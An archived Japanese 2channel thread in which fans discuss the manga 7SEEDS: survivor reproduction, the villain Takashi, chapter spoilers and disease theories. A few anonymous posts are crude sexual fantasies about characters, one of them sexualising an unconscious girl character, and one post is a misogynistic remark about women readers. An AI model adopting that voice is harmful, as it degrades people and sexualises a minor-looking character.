第二次大戦中に取り残された島で女1人を巡る男の壮絶バトル事件があったの思い出した
なんかのサイトで見たけどえらいグロイ話で欝になったな

現実問題少女漫画だからエロ抜きで進んでるけど
実際にじゃあって同じ環境になったら女は妊娠しまくりそう

121 :花と名無しさん:2006/12/23(土) 11:56:51 ID:???0
>>120
うわぁそれは見たいようで見たくないようなグロ話だな

122 :花と名無しさん:2006/12/23(土) 14:02:10 ID:???0
有名な話じゃないか

123 :花と名無しさん:2006/12/23(土) 14:15:17 ID:???0
昔、「青のメソポタミア」っていう漫画があって、地球に取り残されたり、自分の意思で地球に残ったりした異星人が合流して、文明を築き、シュメール文明の祖になったという設定のがあって、
後に、その文明を見つけた、同星人の、「生めよ増やせよで増えていったんだろうよ。」というセリフがあった。

7種のメンバーたちはそのうち合流するだろうから、どこかで、村を築き、落ち着き先が決まったら、子作りに励むのでは・・・。なんといっても、それが人間の本能だし・・・。

124 :花と名無しさん:2006/12/23(土) 15:38:48 ID:???0
鷹に俺の精子を飲んでもらいたい

125 :花と名無しさん:2006/12/23(土) 16:50:34 ID:???0
自分が生きるか死ぬかと言う極限状況で、子作りしようとは思わんだろうしな。
そんなかんじのことを、冬のチームでも言ってたよな

126 :花と名無しさん:2006/12/23(土) 16:52:28 ID:???0
人間って割と死が身近になったら(戦争中とか)子孫を残そうとするけど、
流石にこういう場合は戦争とは違うし子孫を残そうとするかわからんね。
まぁ地球の人類ほぼ滅亡後なんて味わった事ある人いないだろうし。

127 :花と名無しさん:2006/12/23(土) 22:26:29 ID:???0
>>119
なんか過去ログ(田村由美作品19以前)で話題になってた、
火の鳥の望郷篇みたい

128 :花と名無しさん:2006/12/23(土) 23:00:26 ID:???0
19のときにはいなかったけど同じ事オモタ>火の鳥

この作品が火の鳥の一部だったら、血がつながってようが何だろうが
確実にポイポイ子孫を残そうとするだろうな

129 :花と名無しさん:2006/12/24(日) 00:08:42 ID:???O
少女漫画的には夢が…その、ゴニョゴニョ
でもま、主要キャラ関連さえきっちり恋愛フラグ描写があれば後は
ポコポコ産みまくってもかまわんよ。

130 :花と名無しさん:2006/12/24(日) 02:24:59 ID:???0
美鶴さんが二人の子供産んであげるって言ってたの思い出して
切なくなった。

131 :花と名無しさん:2006/12/24(日) 02:50:01 ID:???0
7SEEDSはバトロワと火の鳥と漂流教室と輝夜姫が混ざったような感じだな
輝夜姫はちと違うか

132 :花と名無しさん:2006/12/24(日) 04:04:47 ID:???0
花が入ってることから考えても作られたチームは夏A→春なんだよね。
なんで素直に春夏秋冬の順番で作らなかったのかな・・・

133 :花と名無しさん:2006/12/24(日) 04:25:44 ID:???O
要の祖父は夏が好きだったから夏の季語を子供らの名につけた。
貴士の名字は春に関連してるから下の名も春の季語にした。
のでは?

134 :花と名無しさん:2006/12/24(日) 04:26:36 ID:???0
単純に名前に季語の入ってる人を見つけて、集まった季節からだったりして。

135 :花と名無しさん:2006/12/24(日) 12:42:53 ID:???0
>>119
私が知ってる実話は、たった一人のイギリス人男性とポリネシアン系女性が10名、
子供が20数名だった。この島のことを調べるととてもおそろしい。

136 :花と名無しさん:2006/12/24(日) 14:22:09 ID:???0
>>135
それなんてエロゲ?のレベルだな

137 :花と名無しさん:2006/12/24(日) 17:13:33 ID:???0
>>135
それ18世紀の話だと思っていたら、なんと現代まで続いていてしかも
島の成年男子のほとんどが14歳以下の少女と性行為をしていたことが
明るみになった所だね

138 :花と名無しさん:2006/12/24(日) 17:31:01 ID:???O
春チームの住みか、それぞれの個室がないどころか寝室が男女隣り合わせなのはいかがなものか。

139 :花と名無しさん:2006/12/24(日) 18:51:57 ID:???O
皆、性生活ネタ好きだなあw

140 :花と名無しさん:2006/12/24(日) 19:06:24 ID:???0
>>139
女性対象の漫画とかヒットしてるのはみんな恋愛関係の漫画ばかりだからね
恋愛描写無縁の漫画でヒットした作品は見たこと無いよ
ここが男性コミックと違うところ

141 :花と名無しさん:2006/12/24(日) 19:42:21 ID:???O
まあ少女漫画的には、ここしばらく生々しくグロい実話ネタが細々と続いてると思うけど。
も少し7種では実際どうなりそうかって点で話したいな。

142 :花と名無しさん:2006/12/24(日) 23:51:49 ID:???0
>>137
ピトケアン島か

143 :花と名無しさん:2006/12/24(日) 23:56:15 ID:???0
まあ女ってのは恋愛云々しか興味ないっていうか理解できないからな
難しい設定とか理解できなくて、ただ美形キャラ同士がくっつくくっつかないしてれば満足なんだから。
だから女子高生でも漫画家になれるのさ

144 :花と名無しさん:2006/12/25(月) 00:00:00 ID:???O
貴士もつくづく虐殺に縁のある男だよ。しかし、もとはと言えば良心を殺せる分、人の
心に疎いところがあるからX計画を発動しなけりゃならない今回のような大きなミスを
引き起こしたんじゃないかって気が。

145 :花と名無しさん:2006/12/25(月) 00:04:29 ID:???O
わざわざその女の多い板に来てまで、さもわかったように見下す>>143のような男の気が知れません。

146 :花と名無しさん:2006/12/25(月) 01:49:47 ID:???0
っていうか女に何を期待しているのやら。
ぶっちゃけそのとおり。別に深い設定なんか誰も求めてないの。
ただキャラの恋愛がみたいだけなの。わかる?

147 :花と名無しさん:2006/12/25(月) 01:53:19 ID:???O
>>146
その通りじゃねーよw


148 :花と名無しさん:2006/12/25(月) 02:22:15 ID:???0
ああ、クリスマスだからか。変なのがいるのは

149 :花と名無しさん:2006/12/25(月) 03:48:13 ID:???0
キャラの恋愛なんて必要ありません
美少年同士のカラミがみたいのです
もちろん設定なんていりません

150 :花と名無しさん:2006/12/25(月) 11:21:53 ID:???0
>>148
辛いことが多い日ではあるな

151 :花と名無しさん:2006/12/25(月) 14:14:37 ID:???0
>>149
801板にカエレ!!

152 :花と名無しさん:2006/12/25(月) 14:36:06 ID:???0
私はどちらかというと美少年よりもおじさまの方が・・・・

153 :花と名無しさん:2006/12/25(月) 15:04:05 ID:???0
キャラの絡みなんていりません
桃太郎さえいればいいです

154 :花と名無しさん:2006/12/25(月) 18:38:52 ID:???0
鷹だけ年取ってしまったよね。くっつくにも年齢があいにくくなってしまったけれど、牡丹さんとなら、あうかな?
でも、ガイドは数に入ってないといってたよね。あれ、どういう意味だろう。子孫を残すための種には、なれないということなのかな。
でも、まあ、冷凍された時の世は崩壊してしまってるわけだし、子どもを作っても誰も文句はいわないだろうけど・・・。

155 :花と名無しさん:2006/12/25(月) 21:09:14 ID:???0
牡丹さんと合う年齢の人って、あと十六夜さんと百舌がいるな。
百舌と牡丹さんは同じチーム、十六夜さんとはガイド同士で
顔合わせとかあったのかな。鷹と牡丹さんは面識無し。
作者の中では決まっているけど、物語の中ではまだ出会っていない
カップルって結構いるんだろうね。

156 :花と名無しさん:2006/12/26(火) 00:20:47 ID:???O
鷹の意識的には15才以上からOKなんだろうけど、相手側の意識が問題だな。

157 :花と名無しさん:2006/12/26(火) 00:25:10 ID:???0
俺は解凍失敗した子がいいな
あの子にチンコ突っ込んだらひんやりしてるしキツそうだし最高だと思う

158 :花と名無しさん:2006/12/26(火) 06:17:24 ID:???0
あられちゃん?

159 :花と名無しさん:2006/12/26(火) 13:44:52 ID:???0
冷凍装置からは出て来ているのに、冷凍されていた当時のままの新陳代謝が行われていて生きているなんて、不思議だね。
あの子だけが目覚めないで生きているなんて、作者はその設定について、どんなことを想定しているのだろう。
物語の中で、どんな意味があるんだろうね。

160 :田村由美:2006/12/26(火) 14:19:35 ID:???0
>>159
ああ、そんな子いたね

161 :花と名無しさん:2006/12/26(火) 15:31:13 ID:???0
>>160
ちょwwww

162 :花と名無しさん:2006/12/26(火) 18:51:00 ID:???0
あの子は永遠に目覚めないまま少女のままで聖女扱いされるんじゃないか?
後々の生まれたメンバーの子孫からご本尊として崇められる

163 :花と名無しさん:2006/12/26(火) 20:51:04 ID:???0
バンが治療する事で彼の立ち直りのきっかけになるとか。
他にそんな事出来る人いないみたいだし。

164 :花と名無しさん:2006/12/26(火) 22:28:05 ID:???0
>162
すんごいゆっくりだけど、体の機能は動いてるんだよね??
目覚めないとしても、いずれ死んでしまうのでは…(´・ω・`)
でもそれってあの世界では一番幸せかも・・・

165 :花と名無しさん:2006/12/27(水) 02:57:42 ID:???0
早売りにバレ来てたね

………

166 :花と名無しさん:2006/12/27(水) 07:04:33 ID:???0
長文も読んだ
鬱展開すげー

167 :花と名無しさん:2006/12/27(水) 10:03:15 ID:???0
長文ってどこ

168 :花と名無しさん:2006/12/27(水) 11:20:06 ID:???0
早売りバレスレみてきた
なんとなく読めてたがかなり鬱展開…

本誌早く読みたいよ〜

169 :花と名無しさん:2006/12/27(水) 12:45:59 ID:???0
昔最初のほうだけ読んだ時はナツにイライラして投げたけど
最近出てるぶん一気に読んだら面白かった。

懐かしくなってBASARAも一晩かけて読破して泣いた。

170 :花と名無しさん:2006/12/27(水) 14:34:11 ID:???0
おっちゃん…orz

171 :花と名無しさん:2006/12/27(水) 16:17:02 ID:???0
>>166
おれも聞きたい。長文て?

172 :花と名無しさん:2006/12/27(水) 16:44:59 ID:???0
早売り フラワーズでぐぐる

173 :花と名無しさん:2006/12/27(水) 16:59:05 ID:???0
d
見つけた。読んだよ。鬱…orz

174 :花と名無しさん:2006/12/27(水) 21:29:18 ID:???0
ぐぐって「バレ書きました」ってのは見つけたけど
肝心のバレが見つからない…

おとなしく立ち読みしてきます

175 :花と名無しさん:2006/12/27(水) 21:33:54 ID:???0
↑自己解決しましたorz

176 :花と名無しさん:2006/12/27(水) 21:41:08 ID:???0
>>174俺はいまだにわかんね
とりあえず探して見るが

177 :花と名無しさん:2006/12/27(水) 22:19:23 ID:???0
フラワーズ7種バレ でぐぐって1番目。

178 :花と名無しさん:2006/12/28(木) 11:19:37 ID:???0
>>177
サンクス
うちのとこではもう発売されてた

これ以上キャラ増やすなよとか思ってたのに
マークかわいすぎる



179 :花と名無しさん:2006/12/28(木) 12:16:08 ID:???O
よく言われてた普通の共食いではなかったが、やっぱり虐殺、肥料化と(おそらく)
伝染病のダブル打撃?のようだな…。

180 :花と名無しさん:2006/12/28(木) 12:53:30 ID:???O
やっぱりあの眠らせて撹拌…というやり方は、夏Aの時に覚えたのをそのまま応用してるんだよな。
ちょっとは反省(後悔)してるのかと思わせておいて、全然変化の見えない貴士が怖い。
花はきっと最後まで読んだら両親の事だと気付くんだろうな。
あと、マークのキャラが好きだ。

181 :花と名無しさん:2006/12/28(木) 13:00:03 ID:???0
あのむにゃむにゃってなる波線の口が好きだ

〜←これ

182 :花と名無しさん:2006/12/28(木) 13:18:12 ID:???O
花、気付くかねえ。知り合いのいない関西シェルターにしてもらったことまでマークが
日記に書いてたらわからないけど。夏Aとの接触で初めて気付くかな?と思ってた。

183 :花と名無しさん:2006/12/28(木) 18:44:18 ID:???O
バレ読まずに本誌読んで後悔…

184 :花と名無しさん:2006/12/28(木) 18:54:45 ID:???0
>>183
ん?逆じゃなくて?
本誌読まずにバレ読んじゃって後悔するんなら分かるけど…

185 :花と名無しさん:2006/12/28(木) 19:04:04 ID:???O
心の準備ができてなかったんでない?

186 :花と名無しさん:2006/12/28(木) 20:00:38 ID:???0
今月えぐかったからね

187 :花と名無しさん:2006/12/28(木) 20:32:07 ID:???0
今までバレ見てマークっておっさんだと思ってたけど
若者なんだね

188 :花と名無しさん:2006/12/28(木) 20:41:55 ID:???0
もしかして、コミックス派だけど雑誌バレは読んでるって人がいる?

189 :花と名無しさん:2006/12/28(木) 20:57:45 ID:???0
ノシ
まとめて読みたいからコミクス派
でも毎月バレはチェック

190 :花と名無しさん:2006/12/28(木) 21:02:16 ID:???0
>>182
マークの日記に貴士の最期が記されて素性のわかる事を言い残すとか…。
父親のした事がわかった上で秋ヲや蘭と対峙するのもありか。
夏Aとの接触で日記の貴士が自分の父とわかるのかと思っていたけど。

191 :花と名無しさん:2006/12/28(木) 21:40:21 ID:???0
花は両親じゃないと言い切ってるね。
花の前ではいったいどんな夫婦だったんだろう。

192 :花と名無しさん:2006/12/28(木) 22:17:54 ID:???O
>>190
しかし人間をあんな風に殺しただけでもショックなのに、それが自分の父だなんて
知ったら普通の感覚では耐えられないと思うよ。
その箇所まで読んだ後に花の父らしき記述があったとしても、恐ろしい考えとして
追い出しちゃうんじゃなかろうか。貴士がそういう奴だともう知ってる読者と違い、
花は夏Aのことも知りようがないんだし。
確かに>>190の場合もないと言い切れないのが恐いが。

193 :花と名無しさん:2006/12/28(木) 22:53:36 ID:???O
今日本誌立ち読みしてきたノシ
マークの口〜カワユスねw
しかし…確かにウッてなるね…
タカシが必要ならば我々もそうなる(肥料とかになる)可能性もある、みたいなこと言ってて、結局政府は何がしたいんだ、って思えてきた…

194 :花と名無しさん:2006/12/28(木) 23:28:43 ID:???O
下手したらこの話自体何を言いたいんだって気になるな(;´Д`)
しかし貴士がもう良心の呵責も感じないくらい突き抜けた境地だとわかった今、
彼はどういう死に様が話として納得いくだろう?

195 :花と名無しさん:2006/12/29(金) 00:58:49 ID:???0
貴士は最高だな
ああいうクールで無感情の親父をヒイヒイ言わせたくなる
チンポしゃぶったりアナルに指入れたりして「ら・・・らめぇ・・・」って言わせたい

196 :花と名無しさん:2006/12/29(金) 01:26:40 ID:???0
お偉方のセンセイ達も早く肥料にするんだ

197 :花と名無しさん:2006/12/29(金) 02:29:16 ID:???0
牛が感染病にかかって暴れて人に噛み付いて、それが更に人にうつったとかか?
共食いだからヤコブ病かとも思ったが、潜伏期間が全然ないから違うか

198 :花と名無しさん:2006/12/29(金) 03:12:15 ID:???0
ま、そんなとだろうけど、牛の病気のチェックしなかったのかな?
人間は細かくチェックしたのに、牛はそれほど細かくチェックしきれなかったか?

199 :花と名無しさん:2006/12/29(金) 10:59:33 ID:???0
突っ込むと、アナだらけの計画だぁねー。

私もヤコブ病だと思った。食料がまた減る、みたいな。
それ以外の感染病は想像がつかなかった。

200 :花と名無しさん:2006/12/29(金) 11:02:36 ID:???0
>私もヤコブ病だと思った。食料がまた減る、みたいな。

あ、牛の場合は狂牛病か。スマソ

201 :花と名無しさん:2006/12/29(金) 11:10:14 ID:???0
ピートがサンタの格好したまま朽ちているということは、滅びは間もなくなのか…

202 :花と名無しさん:2006/12/29(金) 12:19:51 ID:???O
貴士はマークに殺されるのかな?どうせ妻と一緒に死ねなかったこと以外の
すべての可能性を考えてて平静なまま逝っちゃいそうだけど。

203 :花と名無しさん:2006/12/29(金) 13:07:00 ID:???0
妻と一緒に死ねなかったから、もうどういう死に方をしても同じ。変わんない。
どうでもいい。

とか思ってそう

204 :花と名無しさん:2006/12/29(金) 13:49:20 ID:???0
他人の生命も自分の生命も投げやりな貴士ワロス

205 :花と名無しさん:2006/12/29(金) 16:47:13 ID:???0
やっぱりオチは
かゆ うま 
なのか…

206 :花と名無しさん:2006/12/29(金) 17:05:56 ID:???0
>>205
わろた


207 :花と名無しさん:2006/12/29(金) 17:46:38 ID:???O
封印の間は感染した人間が閉じこめられたのかな?
なんにしてもグロい…

208 :花と名無しさん:2006/12/29(金) 17:59:27 ID:???0
ラーメン作れなくなったおっちゃんに泣いた

209 :花と名無しさん:2006/12/29(金) 19:11:00 ID:???0
おっちゃんの娘はなんで行かないのか疑問に思った
近親同士をひき離したら通信の虚像がばれる元じゃない?

210 :花と名無しさん:2006/12/29(金) 19:13:09 ID:???0
おっちゃんも娘さんも気づいてたんじゃないのかな

211 :花と名無しさん:2006/12/29(金) 19:19:53 ID:???0
シェルター無人ってことは封印失敗→計画破綻確定
→7seedsのためシェルターだけは遺そう→冬の間閉鎖だったりして。
何にせよあと1〜2話位で日記読み終わりそうだね。

212 :花と名無しさん:2006/12/29(金) 19:43:21 ID:???0
牛ってことに惑わされていたけど案外狂犬病だったりするのかもしれない

213 :花と名無しさん:2006/12/29(金) 22:50:00 ID:???0
狂犬病は人から人への感染の可能性は薄いのでは?

214 :花と名無しさん:2006/12/29(金) 23:03:14 ID:???0
原因がわからないと噛み付いたり引っ掻いたりしてくる人を止めようとして必死になって傷だらけになるんじゃ?
ていうか、仮に狂犬病ならワクチンがなければ助からないから

49 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)